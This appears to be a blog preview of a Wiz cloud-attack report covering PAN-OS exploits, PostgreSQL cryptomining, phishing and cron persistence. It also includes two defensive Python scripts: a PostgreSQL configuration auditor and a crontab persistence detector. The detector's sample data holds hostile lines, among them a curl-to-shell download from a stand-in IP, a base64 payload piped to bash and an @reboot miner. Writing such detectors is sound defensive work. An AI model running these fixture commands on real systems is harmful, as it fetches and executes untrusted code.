Cloud Attacks Retrospective: Evolving Tactics, Familiar Entry Points

Let's break down eight attack patterns security teams should be watching in 2025.


Cloud environments are growing more complex—but attackers aren’t necessarily getting more advanced. Instead, they’re applying creativity to familiar weaknesses: misconfigurations, unpatched systems, and credential misuse. 

That’s the key theme in Wiz’s newly released Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025, a data-driven analysis of real-world cloud attacks based on detections across thousands of environments. The report maps eight of the most frequently observed MITRE ATT&CK techniques to specific threat campaigns, CVEs, and persistent trends across the cloud ecosystem. 

Here’s a preview of what stood out: 


Following the disclosure of CVE-2024-0012 (an authentication bypass in the PAN-OS management web interface) and CVE-2024-9474 (a privilege escalation that, chained with it, gives unauthenticated root command execution), Wiz observed attackers deploying web shells and Sliver implants just days after PoCs went public.

  • 24% of monitored environments contained vulnerable PAN-OS appliances 

  • 7% were internet-facing and exploitable via unauthenticated RCE 

These cases show how quickly attackers pivot from disclosure to exploitation—especially when edge infrastructure is exposed. 

The CPU_HU campaign targeted weakly configured PostgreSQL servers, exploiting default or guessable credentials to deploy cryptominers.

  • 90% of cloud environments analyzed use self-managed PostgreSQL 

  • Nearly one-third had at least one instance exposed publicly 

This underscores how foundational hardening steps—like restricting access and enforcing credential policies—remain critical. 
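The two hardening steps named above (restricting where connections may come from, and not tolerating default or guessable credentials) can be checked mechanically. The following is an added example, not code from the Wiz report: it parses a constructed `pg_hba.conf` and a constructed role/password list and flags the configurations the CPU_HU campaign relies on. Severity labels and the weak-password list are assumptions chosen for illustration.

```python
import ipaddress

# Constructed sample pg_hba.conf (not taken from any real host or from the report).
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER      ADDRESS        METHOD
local   all       postgres                 peer
host    all       all       127.0.0.1/32   scram-sha-256
host    all       all       0.0.0.0/0      md5
host    all       all       ::/0           trust
hostssl app       app_user  10.0.0.0/8     scram-sha-256
"""

# Constructed (role, password) pairs, as might be found in a bootstrap script.
SAMPLE_ROLES = [
    ("postgres", "postgres"),
    ("app_user", "S3cure!long-passphrase"),
    ("admin", "admin123"),
]

# Assumed small deny-list; a real deployment would use a breached-password set.
WEAK_PASSWORDS = {"postgres", "password", "admin", "admin123", "123456", ""}


def parse_pg_hba(text):
    """Return one dict per active rule. 'local' rules have no ADDRESS column."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "local":
            if len(parts) < 4:
                continue
            rules.append({"type": "local", "db": parts[1], "user": parts[2],
                          "address": None, "method": parts[3]})
        elif len(parts) >= 5:
            rules.append({"type": parts[0], "db": parts[1], "user": parts[2],
                          "address": parts[3], "method": parts[4]})
    return rules


def audit_pg_hba(text):
    """Flag rules that accept password-less, world-reachable or weakly hashed logins."""
    findings = []
    for r in parse_pg_hba(text):
        if r["type"] == "local":
            continue  # unix-socket rules are not reachable over the network
        if r["method"] == "trust":
            findings.append(("CRITICAL",
                             f"'trust' auth for {r['user']}@{r['address']}: no password required"))
        addr = r["address"]
        world_reachable = addr == "all"
        if not world_reachable:
            try:
                world_reachable = ipaddress.ip_network(addr, strict=False).prefixlen == 0
            except ValueError:
                world_reachable = False  # hostname or samehost/samenet keyword; not checked here
        if world_reachable:
            findings.append(("HIGH",
                             f"rule for {r['user']} accepts connections from any address "
                             f"({addr}) with method {r['method']}"))
        if r["method"] in ("md5", "password"):
            findings.append(("MEDIUM",
                             f"weak auth method '{r['method']}' for {r['user']}@{addr}; "
                             f"prefer scram-sha-256"))
    return findings


def audit_roles(roles, min_length=12):
    """Return role names whose password is on the deny-list, equals the name, or is short."""
    return [name for name, pw in roles
            if pw.lower() in WEAK_PASSWORDS or pw.lower() == name.lower() or len(pw) < min_length]


if __name__ == "__main__":
    for severity, msg in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"[{severity}] {msg}")
    print("weak credentials:", audit_roles(SAMPLE_ROLES))
```

Pair the config check with a network-level one: PostgreSQL should not be listening on a public interface at all (`listen_addresses` plus a security group or firewall), and the `pg_hba.conf` rules are the second line, not the first.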

Phishing remains the top cause of identity-based cloud breaches. 

  • 0ktapus used spoofed SSO portals to harvest credentials 

  • Atlas Lion employed adversary-in-the-middle proxies and smishing to bypass MFA 

Even with modern defenses, user-targeted phishing continues to yield high success rates in cloud environments. 

Persistence is no longer an afterthought—it’s embedded from the start.

  • In Redis and Jenkins environments, attackers used cron jobs to relaunch cryptominers on reboot 

  • Selenium Grid instances without authentication were abused to execute payloads via browser automation 

Simple, resilient techniques continue to evade detection—especially when deployed on services with limited monitoring. 
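Cron-based persistence of the kind described above is cheap to detect if anyone looks at the crontabs. The following is an added example, not code from the Wiz report: it runs a small set of heuristics over constructed crontab lines and reports the entries a miner operator typically leaves behind (download piped to a shell, base64-decoded payloads, `@reboot` entries, binaries under temp directories, every-minute watchdogs). The sample lines, the miner filename and the 198.51.100.7 address are constructed for illustration.

```python
import re

# Constructed crontab content (not from any real incident): three benign entries
# followed by three that match common cryptominer persistence patterns.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /opt/app/bin/healthcheck.sh
@reboot /tmp/.x/kdevtmpfsi
* * * * * curl -fsSL http://198.51.100.7/a.sh | sh
*/10 * * * * echo bHMgLWxh | base64 -d | bash
"""

# Heuristics: each pattern carries the human-readable reason it is reported.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash)\b"),
     "download piped straight into a shell"),
    (re.compile(r"base64\s+(-d|--decode)\s*\|\s*(sh|bash)\b"),
     "base64-decoded payload piped into a shell"),
    (re.compile(r"^\s*@reboot\b"),
     "@reboot entry (survives restarts)"),
    (re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/"),
     "executable under a world-writable temp directory"),
    (re.compile(r"^\s*(\*\s+){4}\*"),
     "runs every minute (typical miner watchdog)"),
]


def parse_crontab(text):
    """Yield (line_number, entry) for non-comment, non-empty crontab lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        entries.append((lineno, line))
    return entries


def flag_persistence(text):
    """Return one record per entry that matches at least one heuristic."""
    hits = []
    for lineno, line in parse_crontab(text):
        reasons = [why for pattern, why in SUSPICIOUS_PATTERNS if pattern.search(line)]
        if reasons:
            hits.append({"line": lineno, "entry": line, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in flag_persistence(SAMPLE_CRONTAB):
        print(f"line {hit['line']}: {hit['entry']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

On a real host, feed it `crontab -l` for every user plus the files under `/etc/cron.d`, `/etc/cron.*` and `/var/spool/cron`; the same heuristics apply to systemd timer units and to `rc.local`, which the same campaigns also use. The every-minute rule will also catch legitimate jobs, so treat it as a signal to combine with the others rather than an alert on its own.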

What’s inside the full report? 

The Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025 includes: 

  • Detailed analysis of the top MITRE ATT&CK techniques abused by actors in the cloud 

  • Real-world incidents tied to specific CVEs, misconfigurations, and IAM abuse 

  • Campaigns involving Diicot, Bapak, 0ktapus, and more 

  • Practical guidance on how to detect and disrupt attack chains in your environment
